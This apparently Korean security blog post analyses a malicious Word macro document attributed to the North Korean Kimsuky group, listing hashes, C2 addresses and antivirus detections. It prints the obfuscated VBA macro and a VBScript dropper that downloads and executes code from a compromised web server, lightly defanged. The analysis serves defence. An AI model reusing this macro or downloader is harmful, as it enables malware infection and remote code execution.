꿈을꾸는 파랑새

오늘은 북한 해킹 조직 중 하나인 김수키(Kimsuky,キムスキー)는 기본적으로 한국의 싱크탱크,산업계,원자력 발전소 그리고 대북 관계자, 그리고 탈북단체에서 운영하는 주요인물을 대상으로 조직적으로 해킹하고 있으며 한국의 퇴역 장교(특히 대북 기밀 다루었던 분), 전·현직 외교관, 전·현직 정부기관에 일하고 있든 일을 하고 있지 않든 아무튼 대북 관련 단체이며 해킹을 하고 있으며 그리고 최근 영업이 러시아, 미국 및 유럽 국가로 확장하고 있으며

김수키 라는 이름은 이 그룹의 공격을 처음 보고한 러시아 의 보안기업 카스퍼스키 가 도난당한 정보를 보내는 이메일 계정 이름이 김숙향(Kimsukyang)이었기 때문이며 Gold Dragon,Babyshark,Appleseed 등 수많은 악성코드를 사용했으며 전직 이름 탈륨(Thallium), 벨벳 천리마(Velvet Chollima), 블랙반시(Black Banshee) 등으로 불리고 있으며 유엔 안전 보장 이사회(安全保障理事會,UNSC) 도 사업?을 확장 해서 IAEA, 한국항공우주산업 (KAI)이 해킹공격을 해서 KAI에의 해킹은 KAERI와 동시기에 행해졌다고 하는 점에서 동일범에 의한 범행추측

그리고 KAI가 개발하는 한국형 차세대 전투기 KF-21(보라메)과 대우조선해양이 건조하는 도산 안창호 급 잠수함(島山安昌浩級潛水艦)기술 탈취까지 확장하는 조직이며 당연히 일개 개인이 할 수 없는 규모 인걸로 보면 당연히 북한정부 기관에서 주도하고 있을 것이고 개인적인 이야기이지 마 굳이 누구라고 이야기 안 하겠는데. 그 인간의 우마무스메 서포트 카드 뽑으려고 열심히 활동하는 것으로 추정됩니다. ᄏᄏᄏ

123.dotm 매크로 실행 요구
123.dotm 매크로 실행 요구

아무튼, 2023년2월1일 새해에도 가만히 있지 않고 새로운 문서 악성코드를 제작해서 배포하고 있으면 일단 해쉬값은 다음과 같습니다.
파일명:123.dotm
사이즈:21.0 KB
CRC32:4dd8d26f
MD5:9bef135ad78f1cc980556008af92f385
SHA-1:d5a3cc7a429560cf0ef6379f07e1da341c9cf673
SHA-256:38640d508c137d0e05c6d34d6bf5618095baed364482baef908fe1d7b2310e15
SHA-512:dd803f8cc0ab3a01004056a077ced7275b68c4c75bca6b94e37c251b15062aece768e6ba1efd95a23cfeea4209c7e2b279f5cd427f81bb6c2a03c784ee72d11c
이며 해당 워드 파일을 실행하면 조금 성의라도 보여서 이미지 파일이라도 넣어주지 그런 것이 없이 그냥 너~매크로 실행해 합니다.

여기서 보안 경고 매크로를 사용할 수 없도록 설정했습니다. 콘텐츠 사용이라고 된 것을 실행하면 악성코드는 매크로를 통해서 실행합니다.
매크로를 실행하면 다음과 같은 글이 있는 것을 확인할 수가 있습니다. 뭐라고 할까? 너무 정직하니까 이상한 느낌이 들기도 했습니다.

김수키 문서 악성코드 실행
김수키 문서 악성코드 실행

mode 15,1
wscript(.)exe "%~f0?.wsf"
<job><script language="VBScript">
On Error Resume Next:Set ms = CreateObject("Microsoft.XMLHTTP"):ms.open 
"GET", "http://hkisc.co(.)kr/gnuboard4/bbs/img/upload/list(.)php?query=1", False:ms.Send:Execute(ms.responseText)
</script></job>

그리고 매크로 내용은 다음과 같습니다.

Sub Reserve(pth)
    
    mywo(r)d = "b>(<)scr"
    myc(o)mm = "ect(""Mi"
    myf(a)th = "hkisc.co(.)kr/gnuboard4/bbs/img/upload"
    mym(o)th = "T"", ""h"
    myc(o)m1 = "te(O)b"
    myc(o)m2 = mycom1 (&0 "j"
    myma(n)s = "t(p)"
    myco(m)3 = "P""):(m)s.o"
    mycom1 = "ea" (&) mycom2 (&) mycomm (&) "c"
    mycomm = "ro(s)o"
    mytemp = "e(r)y="
    myfats = mymans (&) ":/"
    mycom2 = "t(.)XM"
    mynums = "1""(,) F"
    comm1 = "s = Cr" (&) mycom1 (&) mycomm (&) "f"
    mycomm = (")LH"
    comm2 = comm1 (&) mycom2 (&) mycomm (&) "TT" (&) mycom3
    mycomm = "et m" & comm2 (&) "pen ""G" (&) "E" (&) mymoth
    myfath = myfats (&) "/" (&) myfath
    mycom1 = mycomm (&) "t" (&) myfath
    mymens = "me (N)e"
    myname = "c(r)i"
    mywome = "ist(.)p"
    mymems = "xt:S" (&) mycom1 (&) "/l" (&) mywome
    mymoth = "s(.)S"
    com1 = "r(r)o"
    mycomm = "n (E)"
    com2 = "?(q)"
    com3 = "r R(e)"
    mymans = "O" (&) mycomm (&) com1 (&) com3 (&) "su" (&) mymens
    com3 = "gu(a)g"
    mycomm = "t"">" (&) Chr(13) (&) mymans (&) mymems (&) "hp"
    myfath = "ec(u)t"
    mycom1 = "u" (&) mytemp (&) mynums (&) "als"
    mytemp = mycom1 (&) "e:m" (&) mymoth (&) "en"
    mymoth = "t)" (&) Chr(13) (&) "</sc"
    mycom1 = myname (&) "p" (&) mycomm (&) com2 (&) mytemp
    com2 = "pt l(a)"
    myoks = "cri(p)"
    com1 = "BS" (&) mycom1 (&0 "d:E"
    mytemp = com1 (&) "x" (&) myfath (&) "e(m"
    com1 = "e=""(V)"
    mycomm = "cri" (&) com2 & "n" (&) com3 (&) com1 (&) mytemp (&) "s.re"
    com1 = "><(/)j"
    Documents(.)Add
    com3 = "(t)"
    com2 = "o(b)>"
    com3 = com3 (&) com1 (&) com2
    Set ad = ActiveDocument
    myfath = "5,1" (&) Chr(13) (&) "ws"
    myalls = "b><s" (&) mycomm (&) "spon"
    mems = "sf""" & Chr(13) (&) "<jo" (&) myalls (&) "s"
    mytemp = "e(T)e"
    mems = "~f0?." (&) "w" (&) mems (&) mytemp (&) "x" (&) mymoth
    myalls = "x(e) """
    myoks = "de 1" (&) myfath (&) myoks (&) "t.e" (&) myalls (&) "%" (&) mems
    myalls = "mo" (&) myoks (&) "rip" (&) com3
    
    ad.Range.Text = myalls
    fval = wdFormatText
    ad.SaveAs2 FileName:(=)pth, FileFormat:=fval
    ad.Close
End Sub

Sub Review(vmod)
    On Error Resume Next
    Set wnd = ActiveWindow
    Set sel = Selection
    wnd.View.SeekView = vmod
    rval = False
    sel.WholeStory
    hm = False
    sel.Font.Hidden = hm
    rval = True
    If rval = True Then
        sel.Collapse
    End If
End Sub

Sub ViewContent()
    Mode = 10
    Do Until Mode < 0
        Review (Mode)
        Mode = Mode - 1
    Loop
End Sub

Sub FindDeletePage()
    On Error Resume Next
    Dim rng As Range
    Dim pge As Integer
    pge = 1
    Set rng = Active(D)ocument.Range(0, 0)
    Set rng = rng.GoT(o)(What:=wdGoToPage, Name:=pge)
    Set rng = rng.GoT(o)(What:=wdGoToBookmark, Name:="\page")
    rng.Dele(t)e
    Set rng = Not(h)ing
End Sub

Sub AutoOpen()
    On Error Resume Next
  
    pw = "1qaz2wsx"
    
    
    Set adom = ActiveDocument
    ins = "(w)"
    ts = "x(e) //e:vb"
    cd = " //(b) "
    mt = "scri(p0t"
    ts = ts (&) mt
    ins = ins (&) mt & ".e"
    CurrUser = Application.UserName
    tmpLoc = "C:\Users\" (&) CurrUser & "\AppData\Roaming\Microsoft\Templates"
    pth = tmpLoc (&) "\version.b"
    Weed pw
    pth = pth (&) "at"
    cd = ins (&) ts (&) cd
       
    ViewContent
    FindDeletePage
    Reserve pth
    ts1 = "//e(:0vbscr"
    mt1 = "ip(t)"
    cd1 = " //(b) "
    shpe_reg = "c(m)"
    depStep = shpe_reg (&) "d.ex"
    shpe_reg = "e (/0c "
    depStep = depStep (&) shpe_reg
    bigstr = depStep (&) pth
    tele (bigs(t)r)
    
    adom(.)Save
End Sub

악성코드 에 포함된 매크로
악성코드 에 포함된 매크로

대충 요약을 하면 다음과 같습니다.

wscript.exe //e:vbscript //b C:\Users\admin\AppData\Roaming\Microsoft\Templates\version.bat

그리고 다음 경로에 다음 폴더에 파일을 생성합니다.

C:\Windows\System32\stdole2.tlb
C:\Windows\System32\stdole2.tlb
C:\Users\\version.b

그리고 해당 악성코드는 다음 주소를 사용합니다. 영세규모의 기업들 해킹 해서 C&C 로 사용 하는것 같습니다.

http://hkisc(.)co(.)kr/gnuboard4/bbs/img/upload/list.php?query=1

 

사용하는 IP 트래픽

112.175.246(.)91:80 (TCP)
183.111.141(.)30:80 (TCP)

VirusTotal(바이러스토탈)기준 2023-02-02 06:44:46 UTC에서 탐지하는 보안 업체들은 다음과 같습니다. 
Alibaba:Trojan:Win32/MalDoc.ali1000158
ALYac:Trojan.Downloader.DOC.Gen
Antiy-AVL:Trojan/Macro.Kimsuky.k
Arcabit:VB:Trojan.Valyria.D1EBD
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
Avira (no cloud):W97M/Kimsuky.jwrbj
BitDefender:Trojan.GenericKD.65282362
Cynet:Malicious (score: 99)
Cyren:ABRisk.MHGD-3
DrWeb:Modification Of W97M.Suspicious.1
Emsisoft:VB:Trojan.Valyria.7869 (B)
eScan:VB:Trojan.Valyria.7869
ESET-NOD32:VBA/Kimsuky.K
Fortinet:VBA/Valyria.7869!tr
GData:VB:Trojan.Valyria.7869
Google:Detected
Kaspersky:UDS:DangerousObject.Multi.Generic
MAX:Malware (ai Score=88)
McAfee-GW-Edition:RDN/Kimsuky
NANO-Antivirus:Trojan.Ole2.Vbs-heuristic.druvzi
Rising:Trojan.Kimsuky/VBA!8.1330D (TOPIS:E0:zLEdm1LLPLU)
SentinelOne (Static ML):Static AI - Malicious OPENXML
Symantec:Trojan.Gen.NPE.C
TACHYON:Suspicious/WOX.XSR.Gen
Tencent:Office.Trojan.Sagent.Gdhl
Trellix (FireEye):Trojan.GenericKD.65282362
VIPRE:VB:Trojan.Valyria.7869
ViRobot:DOC.Z.Agent.21515
이며 일단 기본적으로 언제나 기초적인 것은 기본적으로 공식적으로 AV-TEST에서 공식적으로 인정받는 보안프로그램을 설치해서 실시간 감시, 실시간 업데이트 그리고 마이크로소프트 오피스 에서 매크로를 사용하는 것은 항상 신중하게 선택을 해야 하면
그리고 이메일도 신뢰성 있는 사람을 해킹해서 이메일 보낼 수가 있으며 항상 조심하며 기본적인 보안 수칙을 지키는 것이 안전하게 컴퓨터를 사용하는 방법이면 귀찮더라도 백신 프로그램,윈도우 업데이트,각종 드라이버 업데이트,프로그램 최신 업데이트 그리고 프로그램에서 걸어 놓은 최소한의 보안 장치들을 해제하는 것을 하지 말아야 합니다.
그리고 매크로 실행해 달라고 하면 매크로는 사용하지 않는 것을 가장 강력히 추천합니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band